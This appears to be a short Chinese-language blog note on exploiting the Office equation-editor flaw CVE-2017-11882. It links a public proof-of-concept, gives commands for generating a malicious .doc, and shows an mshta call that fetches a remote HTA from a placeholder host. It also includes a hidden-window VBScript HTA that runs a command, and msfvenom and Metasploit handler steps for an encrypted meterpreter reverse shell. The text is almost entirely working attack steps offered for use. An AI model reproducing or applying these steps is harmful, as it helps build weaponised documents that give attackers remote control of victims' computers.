exp

https://github.com/Ridter/CVE-2017-11882.git

CVE-2017-11882-master

使用方法

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
测试谈计算器
由于这个poc执行命令有长度限制,所以可以使用mshta进行执行下载或者是其他命令
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML>


使用msf进行反弹shell
msfvenom 生成payload
msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=123123 LHOST= LPORT= -f psh-cmd
生成payload
msf监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
show options
exploit -j
sessions -i 1

hta
aa

发表评论

电子邮件地址不会被公开。 必填项已用*标注